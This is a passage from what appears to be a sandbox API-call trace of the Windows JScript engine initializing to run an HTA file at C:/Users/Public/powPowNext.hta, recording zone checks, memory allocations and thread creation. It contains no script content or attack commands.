pdwOutFlags=0x19f914*=0x0) returned 0x0 [0132.566] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f934, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f934*=0x0) returned 0x0 [0132.566] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.567] IUnknown:Release (This=0x5f0b00) returned 0x1 [0132.567] IUnknown:Release (This=0x609dbc) returned 0x7 [0132.567] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f8a0 | out: ppu=0x19f8a0) returned 0x0 [0132.567] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0132.567] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0132.567] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.567] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f84c, dwFlags=0x0 | out: pdwZone=0x19f84c*=0xffffffff) returned 0x800c0011 [0132.567] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.567] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.567] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.567] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f850, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f830 | out: pPolicy=0x19f850*=0x0, pdwOutFlags=0x19f830*=0x0) returned 0x0 [0132.567] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f850, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f850*=0x0) returned 0x0 [0132.567] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.567] IUnknown:Release (This=0x5f0b00) returned 0x1 [0132.567] IUnknown:Release (This=0x609dbc) returned 0x7 [0132.568] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f818 | out: ppu=0x19f818) returned 0x0 [0132.568] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0132.568] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0132.568] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.568] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f7c4, dwFlags=0x0 | out: pdwZone=0x19f7c4*=0xffffffff) returned 0x800c0011 [0132.568] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.568] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.568] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.568] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f7c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f7a8 | out: pPolicy=0x19f7c8*=0x0, pdwOutFlags=0x19f7a8*=0x0) returned 0x0 [0132.568] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f7c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f7c8*=0x0) returned 0x0 [0132.568] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.568] IUnknown:Release (This=0x5f0b00) returned 0x1 [0132.568] IUnknown:Release (This=0x609dbc) returned 0x7 [0132.568] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0132.568] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0132.568] CoCreateInstance (in: rclsid=0x19f7dc*(Data1=0x16d51579, Data2=0xa30b, Data3=0x4c8b, Data4=([0]=0xa2, [1]=0x76, [2]=0xf, [3]=0xf4, [4]=0xdc, [5]=0x41, [6]=0xe7, [7]=0x55)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d7169f4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x19f774 | out: ppv=0x19f774*=0xbfe984) returned 0x0 [0132.585] malloc (_Size=0x80) returned 0xbfd720 [0132.585] GetCurrentProcess () returned 0xffffffff [0132.585] GetSystemInfo (in: lpSystemInfo=0x6cd094f0 | out: lpSystemInfo=0x6cd094f0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0132.586] GetVersionExW (in: lpVersionInformation=0x6cd09534*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x6cd09534*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0132.586] GetEnvironmentVariableW (in: lpName="JS_DEBUG_SCOPE", lpBuffer=0x19dbc4, nSize=0x104 | out: lpBuffer="") returned 0x0 [0132.586] IsDebuggerPresent () returned 0 [0132.586] __dllonexit () returned 0x6cb98ce0 [0132.586] __dllonexit () returned 0x6cb98cf0 [0132.586] __dllonexit () returned 0x6cb98d00 [0132.586] __dllonexit () returned 0x6cb98cb0 [0132.587] __dllonexit () returned 0x6cb98cc0 [0132.588] __dllonexit () returned 0x6cb98cd0 [0132.588] GlobalMemoryStatusEx (in: lpBuffer=0x19dd88 | out: lpBuffer=0x19dd88) returned 1 [0132.588] __dllonexit () returned 0x6cb98d20 [0132.589] __dllonexit () returned 0x6cb98d40 [0132.589] __dllonexit () returned 0x6cb98d50 [0132.589] __dllonexit () returned 0x6cb98d70 [0132.589] __dllonexit () returned 0x6cb98d60 [0132.589] __dllonexit () returned 0x6cb98d80 [0132.590] GetModuleFileNameW (in: hModule=0x6c9c0000, lpFilename=0x6cd08e70, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\jscript9.dll" (normalized: "c:\\windows\\syswow64\\jscript9.dll")) returned 0x20 [0132.591] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x76c20000 [0132.592] GetProcAddress (hModule=0x76c20000, lpProcName="ResolveDelayLoadedAPI") returned 0x76ce2570 [0132.592] GetProcAddress (hModule=0x76c20000, lpProcName="ResolveDelayLoadsFromDll") returned 0x76d56250 [0132.592] ResolveDelayLoadedAPI () returned 0x6fe43bc0 [0132.605] CryptAcquireContextW (in: phProv=0x19de08, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19de08*=0x63df20) returned 1 [0132.613] CryptGenRandom (in: hProv=0x63df20, dwLen=0x40, pbBuffer=0x6cd08e30 | out: pbBuffer=0x6cd08e30) returned 1 [0132.613] CryptReleaseContext (hProv=0x63df20, dwFlags=0x0) returned 1 [0132.613] _set_SSE2_enable () returned 0x1 [0132.614] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\JScriptLegacy", ulOptions=0x0, samDesired=0x20019, phkResult=0x19de08 | out: phkResult=0x19de08*=0x0) returned 0x2 [0132.614] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\JScriptLegacy", ulOptions=0x0, samDesired=0x20019, phkResult=0x19de08 | out: phkResult=0x19de08*=0x0) returned 0x2 [0132.614] EtwEventRegister () returned 0x0 [0132.614] EtwEventRegister () returned 0x0 [0132.614] EtwEventRegister () returned 0x0 [0132.614] FindAtomW (lpString="{1b7cd997-e5ff-4932-a7a6-2a9e636da385}") returned 0x0 [0132.614] AddAtomW (lpString="{16d51579-a30b-4c8b-a276-0ff4dc41e755}") returned 0xc005 [0132.616] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x74530000 [0132.616] GetProcAddress (hModule=0x74530000, lpProcName="QueryProtectedPolicy") returned 0x76cf2bc0 [0132.616] VirtualProtect (in: lpAddress=0x6cd0b414, dwSize=0x4, flNewProtect=0x4, lpflOldProtect=0x19de08 | out: lpflOldProtect=0x19de08*=0x2) returned 1 [0132.617] VirtualProtect (in: lpAddress=0x6cd0b414, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x19de08 | out: lpflOldProtect=0x19de08*=0x4) returned 1 [0132.617] DllGetClassObject (in: rclsid=0x5fec74*(Data1=0x16d51579, Data2=0xa30b, Data3=0x4c8b, Data4=([0]=0xa2, [1]=0x76, [2]=0xf, [3]=0xf4, [4]=0xdc, [5]=0x41, [6]=0xe7, [7]=0x55)), riid=0x76db7590*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19e8ac | out: ppv=0x19e8ac*=0x8c0558) returned 0x0 [0132.617] NdrDllGetClassObject (in: rclsid=0x5fec74*(Data1=0x16d51579, Data2=0xa30b, Data3=0x4c8b, Data4=([0]=0xa2, [1]=0x76, [2]=0xf, [3]=0xf4, [4]=0xdc, [5]=0x41, [6]=0xe7, [7]=0x55)), riid=0x76db7590*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19e8ac, pProxyFileList=0x6c9dd5a4, pclsid=0x6c9ca8fc*(Data1=0xc20ed5c4, Data2=0xa2e, Data3=0x4f66, Data4=([0]=0x9b, [1]=0xe2, [2]=0x86, [3]=0xa1, [4]=0xc8, [5]=0x23, [6]=0xdd, [7]=0x68)), pPSFactoryBuffer=0x6cd08e0c | out: ppv=0x19e8ac*=0x0) returned 0x80040111 [0132.618] malloc (_Size=0x34) returned 0x8c0558 [0132.618] JScriptEngine11:IClassFactory:CreateInstance (in: This=0x8c0558, pUnkOuter=0x0, riid=0x19f2e0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x19e894 | out: ppvObject=0x19e894*=0xbfe984) returned 0x0 [0132.618] malloc (_Size=0x220) returned 0xbfe968 [0132.619] GetUserDefaultLCID () returned 0x409 [0132.619] GetACP () returned 0x4e4 [0132.619] malloc (_Size=0x8) returned 0x8c0598 [0132.619] SetThreadStackGuarantee (in: StackSizeInBytes=0x19e7cc | out: StackSizeInBytes=0x19e7cc) returned 1 [0132.619] malloc (_Size=0xc) returned 0xbf7820 [0132.619] malloc (_Size=0x1240) returned 0xbfeb90 [0132.620] GetCurrentThreadId () returned 0xb48 [0132.620] RtlInitializeSListHead (in: ListHead=0xbfebc8 | out: ListHead=0xbfebc8) [0132.620] malloc (_Size=0x30) returned 0x8c1110 [0132.620] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x7350000 [0132.622] malloc (_Size=0x20) returned 0xbffdd8 [0132.622] malloc (_Size=0xc0) returned 0xbffe00 [0132.622] GetCurrentProcess () returned 0xffffffff [0132.622] GetProcessIoCounters (in: hProcess=0xffffffff, lpIoCounters=0x19e750 | out: lpIoCounters=0x19e750) returned 1 [0132.622] QueryPerformanceCounter (in: lpPerformanceCount=0x19e738 | out: lpPerformanceCount=0x19e738*=3095144117368) returned 1 [0132.622] GetCurrentThread () returned 0xfffffffe [0132.622] QueryThreadCycleTime (in: ThreadHandle=0xfffffffe, CycleTime=0x19e780 | out: CycleTime=0x19e780) returned 1 [0132.622] QueryPerformanceCounter (in: lpPerformanceCount=0x19e768 | out: lpPerformanceCount=0x19e768*=3095144147911) returned 1 [0132.623] GetCurrentProcess () returned 0xffffffff [0132.623] GetProcessIoCounters (in: hProcess=0xffffffff, lpIoCounters=0x19e750 | out: lpIoCounters=0x19e750) returned 1 [0132.623] QueryPerformanceCounter (in: lpPerformanceCount=0x19e738 | out: lpPerformanceCount=0x19e738*=3095144162519) returned 1 [0132.623] GetCurrentThread () returned 0xfffffffe [0132.623] QueryThreadCycleTime (in: ThreadHandle=0xfffffffe, CycleTime=0x19e780 | out: CycleTime=0x19e780) returned 1 [0132.623] QueryPerformanceCounter (in: lpPerformanceCount=0x19e768 | out: lpPerformanceCount=0x19e768*=3095144178232) returned 1 [0132.623] GetCurrentProcess () returned 0xffffffff [0132.623] GetProcessIoCounters (in: hProcess=0xffffffff, lpIoCounters=0x19e750 | out: lpIoCounters=0x19e750) returned 1 [0132.623] QueryPerformanceCounter (in: lpPerformanceCount=0x19e738 | out: lpPerformanceCount=0x19e738*=3095144198883) returned 1 [0132.623] GetCurrentThread () returned 0xfffffffe [0132.623] QueryThreadCycleTime (in: ThreadHandle=0xfffffffe, CycleTime=0x19e780 | out: CycleTime=0x19e780) returned 1 [0132.623] QueryPerformanceCounter (in: lpPerformanceCount=0x19e768 | out: lpPerformanceCount=0x19e768*=3095144214683) returned 1 [0132.623] QueryPerformanceCounter (in: lpPerformanceCount=0x19e780 | out: lpPerformanceCount=0x19e780*=3095144221475) returned 1 [0132.624] GetCurrentThreadId () returned 0xb48 [0132.624] GetCurrentThreadId () returned 0xb48 [0132.624] malloc (_Size=0x30) returned 0xbffec8 [0132.625] JScriptEngine11:IUnknown:AddRef (This=0xbfe984) returned 0x2 [0132.625] JScriptEngine11:IUnknown:Release (This=0xbfe984) returned 0x1 [0132.625] JScriptEngine11:IUnknown:Release (This=0x8c0558) returned 0x0 [0132.625] free (_Block=0x8c0558) [0132.626] JScriptEngine11:IUnknown:QueryInterface (in: This=0xbfe984, riid=0x6d7169f4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x19f714 | out: ppvObject=0x19f714*=0xbfe984) returned 0x0 [0132.626] JScriptEngine11:IUnknown:Release (This=0xbfe984) returned 0x1 [0132.626] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0132.626] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0132.626] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.626] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f6a0, dwFlags=0x0 | out: pdwZone=0x19f6a0*=0xffffffff) returned 0x800c0011 [0132.626] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.626] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.626] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0132.627] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1401, pPolicy=0x19f6a4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f684 | out: pPolicy=0x19f6a4*=0x0, pdwOutFlags=0x19f684*=0x0) returned 0x0 [0132.627] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1401, pPolicy=0x19f6a4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f6a4*=0x0) returned 0x0 [0132.627] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0132.627] IUnknown:Release (This=0x5f0b00) returned 0x1 [0132.627] IUnknown:Release (This=0x609dbc) returned 0x7 [0132.627] GetCurrentThreadId () returned 0xb48 [0132.627] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.628] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.628] GetCurrentThreadId () returned 0xb48 [0132.628] malloc (_Size=0x84) returned 0xbfff00 [0132.628] malloc (_Size=0x748) returned 0xbfff90 [0132.629] malloc (_Size=0x8610) returned 0xc006e0 [0132.629] RtlInitializeSListHead (in: ListHead=0xc00778 | out: ListHead=0xc00778) [0132.629] RtlInitializeSListHead (in: ListHead=0xc00798 | out: ListHead=0xc00798) [0132.630] malloc (_Size=0x113c) returned 0xc08cf8 [0132.630] malloc (_Size=0x113c) returned 0xc09e40 [0132.631] GetTickCount () returned 0x1d6bfcd [0132.631] GetTickCount () returned 0x1d6bfcd [0132.631] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388 [0132.632] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c [0132.632] malloc (_Size=0x30) returned 0x8c0558 [0132.632] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390 [0132.632] _beginthreadex (in: _Security=0x0, _StackSize=0x493e0, _StartAddress=0x6cb607c0, _ArgList=0xc006e0, _InitFlag=0x10000, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x394 [0132.632] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x19f590*=0x38c, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0132.639] malloc (_Size=0x74) returned 0xc0af88 [0132.639] malloc (_Size=0x88) returned 0xc0b008 [0132.639] malloc (_Size=0x30) returned 0xc0b098 [0132.639] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x203000, flProtect=0x4) returned 0x7400000 [0132.640] malloc (_Size=0x404) returned 0xc0b3c8 [0132.641] malloc (_Size=0x7c) returned 0xbfd258 [0132.641] malloc (_Size=0x404) returned 0xc0b7d8 [0132.642] malloc (_Size=0x80) returned 0xbfcea0 [0132.642] malloc (_Size=0x20) returned 0xc0b0d0 [0132.642] malloc (_Size=0x9dc) returned 0xc0bbe8 [0132.643] malloc (_Size=0x2478) returned 0xc0c5d0 [0132.643] malloc (_Size=0xf8) returned 0xc0ea50 [0132.644] malloc (_Size=0x4c) returned 0xc0b0f8 [0132.644] malloc (_Size=0x3c) returned 0xc0b150 [0132.644] malloc (_Size=0x88) returned 0xc0eb50 [0132.645] malloc (_Size=0xd0) returned 0xc0ebe0 [0132.645] malloc (_Size=0x78) returned 0xc0ecb8 [0132.645] malloc (_Size=0xb0) returned 0xc0ed38 [0132.645] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398 [0132.645] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c [0132.688] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x6cb46580, _ArgList=0xc0ed38, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x3a0 [0132.690] ResumeThread (hThread=0x3a0) returned 0x1 [0132.690] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x19f524*=0x39c, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0132.698] ResetEvent (hEvent=0x39c) returned 1 [0132.698] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0132.698] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a8 [0132.698] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac [0132.698] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0 [0132.699] QueryPerformanceFrequency (in: lpFrequency=0x6cd09468 | out: lpFrequency=0x6cd09468*=100000000) returned 1 [0132.699] QueryPerformanceCounter (in: lpPerformanceCount=0x6cd09460 | out: lpPerformanceCount=0x6cd09460*=3095151773974) returned 1 [0132.699] malloc (_Size=0x84) returned 0xc0edf0 [0132.699] malloc (_Size=0x80) returned 0xbfd1d0 [0132.700] malloc (_Size=0x174) returned 0xc0ee80 [0132.700] malloc (_Size=0xc) returned 0xbf7838 [0132.700] malloc (_Size=0x74) returned 0xc0f230 [0132.700] malloc (_Size=0x178) returned 0xc0f2b0 [0132.701] malloc (_Size=0x9c) returned 0xc0f430 [0132.702] malloc (_Size=0x174) returned 0xc0f4d8 [0132.703] malloc (_Size=0xf8) returned 0xc0f658 [0132.705] malloc (_Size=0xf8) returned 0xc0f758 [0132.706] malloc (_Size=0xc4) returned 0xc0f858 [0132.706] malloc (_Size=0xcc) returned 0xc0f928 [0132.707] malloc (_Size=0x104) returned 0xc0fa00 [0132.707] malloc (_Size=0xa4) returned 0xc0fb10 [0132.707] malloc (_Size=0x7c) returned 0xbfd148 [0132.707] malloc (_Size=0x74) returned 0xc0fbc0 [0132.707] malloc (_Size=0x30) returned 0xc0fc40 [0132.707] malloc (_Size=0x30) returned 0xc0fc78 [0132.708] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x7560000 [0132.708] malloc (_Size=0xc) returned 0x8c1148 [0132.708] malloc (_Size=0x12c) returned 0xc0fcb0 [0132.709] malloc (_Size=0xb8) returned 0xc0fde8 [0132.709] malloc (_Size=0xb8) returned 0xc0fea8 [0132.710] malloc (_Size=0xf4) returned 0xc0ff68 [0132.710] malloc (_Size=0x98) returned 0xc10068 [0132.711] malloc (_Size=0xa8) returned 0xc10108 [0132.711] malloc (_Size=0xb4) returned 0xc101b8 [0132.711] malloc (_Size=0xb0) returned 0xc10278 [0132.712] malloc (_Size=0x94) returned 0xc10330 [0132.712] malloc (_Size=0x80) returned 0xbfd2e0 [0132.713] ResolveDelayLoadedAPI () returned 0x74405c20 [0132.713] SafeArrayCopy (in: psa=0x0, ppsaOut=0x741002c | out: ppsaOut=0x741002c) returned 0x0 [0132.713] malloc (_Size=0xdc) returned 0xc103d0 [0132.714] malloc (_Size=0xf8) returned 0xc104b8 [0132.714] malloc (_Size=0xc) returned 0xc105b8 [0132.715] GetCurrentThreadId () returned 0xb48 [0132.715] malloc (_Size=0x10) returned 0xc105d0 [0132.715] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x19f608, nSize=0x27 | out: lpBuffer="") returned 0x0 [0132.715] GetCurrentThreadId () returned 0xb48 [0132.715] GetCurrentThreadId () returned 0xb48 [0132.715] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f400 | out: ppu=0x19f400) returned 0x0 [0132.715] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0132.716] GetProcAddress (hModule=0x743f0000, lpProcName=0x2) returned 0x74409c90 [0132.716] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f3b4 | out: lpflOldProtect=0x19f3b4*=0x4) returned 1 [0132.716] SysStringLen (param_1="file:///C:/Users/Public/powPowNext.hta") returned 0x26 [0132.716] GetCurrentThreadId () returned 0xb48 [0132.716] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0132.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1004, lpLCData=0x19f6ac, cchData=6 | out: lpLCData="1252") returned 5 [0132.717] IsValidCodePage (CodePage=0x4e4) returned 1 [0132.717] GetCurrentThreadId () returned 0xb48 [0132.717] GetCurrentThreadId () returned 0xb48 [0132.718] GetCurrentThreadId () returned 0xb48 [0132.718] malloc (_Size=0x2c) returned 0xc105e8 [0132.718] GetCurrentThreadId () returned 0xb48 [0132.718] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0132.718] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.718] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.719] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x55b501a5, dwHighDateTime=0x1d7d80b)) [0132.719] GetTickCount () returned 0x1d6c01b [0132.722] malloc (_Size=0x184) returned 0xc10620 [0132.722] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x55b57626, dwHighDateTime=0x1d7d80b)) [0132.722] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x55b57626, dwHighDateTime=0x1d7d80b)) [0132.722] GetTickCount () returned 0x1d6c01b [0132.722] malloc (_Size=0x30) returned 0xc107b0 [0132.722] malloc (_Size=0xa0) returned 0xc107e8 [0132.723] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x55b59da4, dwHighDateTime=0x1d7d80b)) [0132.723] CoCreateInstance (in: rclsid=0x6d721078*(Data1=0x842a1268, Data2=0x6e6a, Data3=0x465c, Data4=([0]=0x86, [1]=0x8f, [2]=0x8b, [3]=0xc4, [4]=0x45, [5]=0xb9, [6]=0x82, [7]=0x8f)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d71f6dc*(Data1=0x8f88fd19, Data2=0x5d42, Data3=0x477b, Data4=([0]=0xbd, [1]=0x45, [2]=0xf6, [3]=0xa4, [4]=0xa9, [5]=0x77, [6]=0xed, [7]=0x5)), ppv=0x19f704 | out: ppv=0x19f704*=0xc108d8) returned 0x0 [0132.724] DllGetClassObject (in: rclsid=0x5feca8*(Data1=0x842a1268, Data2=0x6e6a, Data3=0x465c, Data4=([0]=0x86, [1]=0x8f, [2]=0x8b, [3]=0xc4, [4]=0x45, [5]=0xb9, [6]=0x82, [7]=0x8f)), riid=0x76db7590*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19e84c | out: ppv=0x19e84c*=0xc10890) returned 0x0 [0132.725] NdrDllGetClassObject (in: rclsid=0x5feca8*(Data1=0x842a1268, Data2=0x6e6a, Data3=0x465c, Data4=([0]=0x86, [1]=0x8f, [2]=0x8b, [3]=0xc4, [4]=0x45, [5]=0xb9, [6]=0x82, [7]=0x8f)), riid=0x76db7590*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19e84c, pProxyFileList=0x6c9dd5a4, pclsid=0x6c9ca8fc*(Data1=0xc20ed5c4, Data2=0xa2e, Data3=0x4f66, Data4=([0]=0x9b, [1]=0xe2, [2]=0x86, [3]=0xa1, [4]=0xc8, [5]=0x23, [6]=0xdd, [7]=0x68)), pPSFactoryBuffer=0x6cd08e0c | out: ppv=0x19e84c*=0x0) returned 0x80040111 [0132.725] malloc (_Size=0x34) returned 0xc10890 [0132.727] IClassFactory:CreateInstance (in: This=0xc10890, pUnkOuter=0x0, riid=0x19f280*(Data1=0x8f88fd19, Data2=0x5d42, Data3=0x477b, Data4=([0]=0xbd, [1]=0x45, [2]=0xf6, [3]=0xa4, [4]=0xa9, [5]=0x77, [6]=0xed, [7]=0x5)), ppvObject=0x19e834 | out: ppvObject=0x19e834*=0xc108d8) returned 0x0 [0132.727] malloc (_Size=0x5c) returned 0xc108d0 [0132.727] GetCurrentThreadId () returned 0xb48 [0132.727] IUnknown:Release (This=0xc108d8) returned 0x1 [0132.727] IUnknown:Release (This=0xc10890) returned 0x0 [0132.727] free (_Block=0xc10890) [0132.727] IUnknown:QueryInterface (in: This=0xc108d8, riid=0x6d71f6dc*(Data1=0x8f88fd19, Data2=0x5d42, Data3=0x477b, Data4=([0]=0xbd, [1]=0x45, [2]=0xf6, [3]=0xa4, [4]=0xa9, [5]=0x77, [6]=0xed, [7]=0x5)), ppvObject=0x19f6b4 | out: ppvObject=0x19f6b4*=0xc108d8) returned 0x0 [0132.728] IUnknown:Release (This=0xc108d8) returned 0x1 [0132.728] RtlAllocateHeap (HeapHandle=0x5e0000, 